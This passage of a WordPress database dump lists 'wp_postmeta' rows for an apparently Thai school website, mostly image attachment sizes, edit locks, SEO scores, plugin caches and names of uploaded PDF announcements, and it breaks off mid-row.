(10829, 4873, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48281739_724167731292751_3277769648459743232_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48281739_724167731292751_3277769648459743232_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48281739_724167731292751_3277769648459743232_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48281739_724167731292751_3277769648459743232_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48281739_724167731292751_3277769648459743232_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48281739_724167731292751_3277769648459743232_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10830, 4872, '_thumbnail_id', '4873'),
(10834, 4872, '_hide_featured', NULL),
(10835, 4872, '_yoast_wpseo_content_score', '30'),
(10836, 4872, '_yoast_wpseo_primary_category', '31'),
(10837, 4872, '_wpas_done_all', '1'),
(10838, 4875, '_edit_lock', '1546830335:3'),
(10839, 4875, '_edit_last', '3'),
(10846, 4875, '_hide_featured', NULL),
(10847, 4875, '_yoast_wpseo_content_score', '30'),
(10848, 4875, '_yoast_wpseo_primary_category', '31'),
(10849, 4875, '_wpas_done_all', '1'),
(10850, 4879, '_wp_attached_file', '2019/01/48156170_2087827881237405_7679429700233461760_n.jpg'),
(10851, 4879, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2019/01/48156170_2087827881237405_7679429700233461760_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"48156170_2087827881237405_7679429700233461760_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"48156170_2087827881237405_7679429700233461760_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"48156170_2087827881237405_7679429700233461760_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"48156170_2087827881237405_7679429700233461760_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10852, 4875, '_thumbnail_id', '4879'),
(10855, 4881, '_edit_lock', '1546830550:3'),
(10856, 4881, '_edit_last', '3'),
(10857, 4882, '_wp_attached_file', '2019/01/48393888_728272754215582_8878521888523943936_o.jpg'),
(10858, 4882, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48393888_728272754215582_8878521888523943936_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48393888_728272754215582_8878521888523943936_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48393888_728272754215582_8878521888523943936_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48393888_728272754215582_8878521888523943936_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48393888_728272754215582_8878521888523943936_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48393888_728272754215582_8878521888523943936_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10859, 4881, '_thumbnail_id', '4882'),
(10863, 4881, '_hide_featured', NULL),
(10864, 4881, '_yoast_wpseo_content_score', '30'),
(10865, 4881, '_yoast_wpseo_primary_category', '31'),
(10866, 4881, '_wpas_done_all', '1'),
(10867, 4884, '_edit_lock', '1546830848:3'),
(10868, 4884, '_edit_last', '3'),
(10869, 4885, '_wp_attached_file', '2019/01/49002928_728393454203512_4397274456372805632_o.jpg'),
(10870, 4885, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1473;s:6:\"height\";i:716;s:4:\"file\";s:58:\"2019/01/49002928_728393454203512_4397274456372805632_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"49002928_728393454203512_4397274456372805632_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"49002928_728393454203512_4397274456372805632_o-300x146.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:146;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"49002928_728393454203512_4397274456372805632_o-768x373.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"49002928_728393454203512_4397274456372805632_o-1024x498.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"49002928_728393454203512_4397274456372805632_o-400x194.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10871, 4884, '_thumbnail_id', '4885'),
(10875, 4884, '_hide_featured', NULL),
(10876, 4884, '_yoast_wpseo_content_score', '30'),
(10877, 4884, '_yoast_wpseo_primary_category', '31'),
(10878, 4884, '_wpas_done_all', '1'),
(10879, 4887, '_edit_lock', '1546830949:3'),
(10880, 4887, '_edit_last', '3'),
(10881, 4888, '_wp_attached_file', '2019/01/48417458_728283394214518_7168201306358677504_o.jpg'),
(10882, 4888, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48417458_728283394214518_7168201306358677504_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48417458_728283394214518_7168201306358677504_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48417458_728283394214518_7168201306358677504_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48417458_728283394214518_7168201306358677504_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48417458_728283394214518_7168201306358677504_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48417458_728283394214518_7168201306358677504_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10883, 4887, '_thumbnail_id', '4888'),
(10887, 4887, '_hide_featured', NULL),
(10888, 4887, '_yoast_wpseo_content_score', '30'),
(10889, 4887, '_yoast_wpseo_primary_category', '31'),
(10890, 4887, '_wpas_done_all', '1'),
(10891, 4890, '_edit_lock', '1546913660:3'),
(10892, 4881, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575716175;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6176;}i:1;a:1:{s:2:\"id\";i:4098;}i:2;a:1:{s:2:\"id\";i:6147;}}}}'),
(10893, 4890, '_edit_last', '3'),
(10894, 4891, '_wp_attached_file', '2019/01/ประกาศ-รับสมัครสอบคัดเลือกครูอัตราจ้าง.pdf'),
(10898, 4890, '_hide_featured', NULL),
(10899, 4890, '_yoast_wpseo_content_score', '30'),
(10900, 4890, '_yoast_wpseo_primary_category', '3'),
(10901, 4890, '_wpas_done_all', '1'),
(10902, 4890, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1568781712;s:7:\"payload\";a:0:{}}}'),
(10903, 4893, '_edit_lock', '1546916924:3'),
(10904, 4893, '_edit_last', '3'),
(10905, 4894, '_wp_attached_file', '2019/01/ประกาศ-รับสมัครสอบคัดเลือกเจ้าหน้าที่ธุรการ.pdf'),
(10909, 4893, '_hide_featured', NULL),
(10910, 4893, '_yoast_wpseo_content_score', '60'),
(10911, 4893, '_yoast_wpseo_primary_category', '3'),
(10912, 4893, '_wpas_done_all', '1'),
(10913, 4896, '_edit_lock', '1546833556:3'),
(10914, 4896, '_edit_last', '3'),
(10915, 4897, '_wp_attached_file', '2019/01/48377778_728296727546518_5541178986379345920_o.jpg'),
(10916, 4897, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48377778_728296727546518_5541178986379345920_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48377778_728296727546518_5541178986379345920_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48377778_728296727546518_5541178986379345920_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48377778_728296727546518_5541178986379345920_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48377778_728296727546518_5541178986379345920_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48377778_728296727546518_5541178986379345920_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10917, 4896, '_thumbnail_id', '4897'),
(10921, 4896, '_hide_featured', NULL),
(10922, 4896, '_yoast_wpseo_content_score', '30'),
(10923, 4896, '_yoast_wpseo_primary_category', '31'),
(10924, 4896, '_wpas_done_all', '1'),
(10925, 4899, '_edit_lock', '1546834749:3'),
(10926, 4899, '_edit_last', '3'),
(10927, 4884, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575676764;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:4951;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(10928, 4900, '_wp_attached_file', '2019/01/48420527_728420944200763_7014242010290716672_o.jpg'),
(10929, 4900, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1187;s:6:\"height\";i:890;s:4:\"file\";s:58:\"2019/01/48420527_728420944200763_7014242010290716672_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48420527_728420944200763_7014242010290716672_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48420527_728420944200763_7014242010290716672_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48420527_728420944200763_7014242010290716672_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48420527_728420944200763_7014242010290716672_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48420527_728420944200763_7014242010290716672_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10930, 4899, '_thumbnail_id', '4900'),
(10934, 4899, '_hide_featured', NULL),
(10935, 4899, '_yoast_wpseo_content_score', '30'),
(10936, 4899, '_yoast_wpseo_primary_category', '31'),
(10937, 4899, '_wpas_done_all', '1'),
(10942, 4904, '_wp_attached_file', '2018/12/หนังสือมอบอำนาจ-สำหรับลงทะเบียน.pdf'),
(10947, 4907, '_edit_lock', '1546837305:3'),
(10948, 4907, '_edit_last', '3'),
(10949, 4908, '_wp_attached_file', '2019/01/48380602_728434737532717_7711788125575446528_o.jpg'),
(10950, 4908, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1370;s:6:\"height\";i:771;s:4:\"file\";s:58:\"2019/01/48380602_728434737532717_7711788125575446528_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48380602_728434737532717_7711788125575446528_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48380602_728434737532717_7711788125575446528_o-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48380602_728434737532717_7711788125575446528_o-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48380602_728434737532717_7711788125575446528_o-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48380602_728434737532717_7711788125575446528_o-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10951, 4907, '_thumbnail_id', '4908'),
(10955, 4907, '_hide_featured', NULL),
(10956, 4907, '_yoast_wpseo_content_score', '30'),
(10957, 4907, '_yoast_wpseo_primary_category', '31'),
(10958, 4907, '_wpas_done_all', '1'),
(10959, 4893, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575020622;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(10960, 4910, '_tablepress_table_options', '{\"last_editor\":1,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(10961, 4910, '_tablepress_table_visibility', '{\"rows\":[1,1,1,1,1],\"columns\":[1,1,1,1,1]}'),
(10962, 4875, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575051717;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5291;}i:1;a:1:{s:2:\"id\";i:3975;}i:2;a:1:{s:2:\"id\";i:3968;}}}}'),
(10963, 4872, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575059336;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6326;}i:1;a:1:{s:2:\"id\";i:6320;}i:2;a:1:{s:2:\"id\";i:5477;}}}}'),
(10964, 4907, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575659267;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4899;}i:1;a:1:{s:2:\"id\";i:4937;}i:2;a:1:{s:2:\"id\";i:5926;}}}}'),
(10965, 4914, '_wp_attached_file', '2018/12/7-1-2562-14-59-23.png'),
(10966, 4914, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1033;s:6:\"height\";i:808;s:4:\"file\";s:29:\"2018/12/7-1-2562-14-59-23.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-1-2562-14-59-23-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"7-1-2562-14-59-23-300x235.png\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"7-1-2562-14-59-23-768x601.png\";s:5:\"width\";i:768;s:6:\"height\";i:601;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"7-1-2562-14-59-23-1024x801.png\";s:5:\"width\";i:1024;s:6:\"height\";i:801;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-1-2562-14-59-23-384x300.png\";s:5:\"width\";i:384;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10973, 4920, '_edit_lock', '1621566624:14'),
(10974, 4920, '_edit_last', '14'),
(10975, 4921, '_wp_attached_file', '2019/01/มาตรฐานการศึกษาของสถานศึกษา-61-compressed.pdf'),
(10976, 4920, '_hide_featured', NULL),
(10977, 4920, '_yoast_wpseo_content_score', '60'),
(10978, 1753, '_yoast_wpseo_content_score', '90'),
(10979, 4927, '_edit_lock', '1547598998:1'),
(10980, 4927, '_edit_last', '1'),
(10981, 4927, '_hide_featured', NULL),
(10982, 4927, '_yoast_wpseo_content_score', '90'),
(10983, 4899, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575604977;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4934;}i:1;a:1:{s:2:\"id\";i:4887;}i:2;a:1:{s:2:\"id\";i:4884;}}}}'),
(10984, 4896, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575609246;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5979;}i:1;a:1:{s:2:\"id\";i:6143;}i:2;a:1:{s:2:\"id\";i:5806;}}}}'),
(10985, 4887, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575420563;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4884;}i:1;a:1:{s:2:\"id\";i:3961;}i:2;a:1:{s:2:\"id\";i:5855;}}}}'),
(10986, 4932, '_wp_attached_file', '2019/01/ประกาศ-รับสมัครสอบคัดเลือกครูอัตราจ้าง-edit.pdf'),
(10989, 4934, '_edit_lock', '1546914328:3'),
(10990, 4934, '_edit_last', '3'),
(10991, 4935, '_wp_attached_file', '2019/01/48394437_728467350862789_3656186667015864320_o.jpg'),
(10992, 4935, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/01/48394437_728467350862789_3656186667015864320_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"48394437_728467350862789_3656186667015864320_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"48394437_728467350862789_3656186667015864320_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"48394437_728467350862789_3656186667015864320_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"48394437_728467350862789_3656186667015864320_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"48394437_728467350862789_3656186667015864320_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10993, 4934, '_thumbnail_id', '4935'),
(10997, 4934, '_hide_featured', NULL),
(10998, 4934, '_yoast_wpseo_content_score', '30'),
(10999, 4934, '_yoast_wpseo_primary_category', '31'),
(11000, 4934, '_wpas_done_all', '1'),
(11001, 4937, '_edit_lock', '1546914746:3'),
(11002, 4937, '_edit_last', '3'),
(11005, 4939, '_wp_attached_file', '2019/01/48374988_2227827257241311_7520540842566615040_o.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(11006, 4939, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1940;s:6:\"height\";i:1092;s:4:\"file\";s:59:\"2019/01/48374988_2227827257241311_7520540842566615040_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"48374988_2227827257241311_7520540842566615040_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"48374988_2227827257241311_7520540842566615040_o-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"48374988_2227827257241311_7520540842566615040_o-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"48374988_2227827257241311_7520540842566615040_o-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"48374988_2227827257241311_7520540842566615040_o-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_leng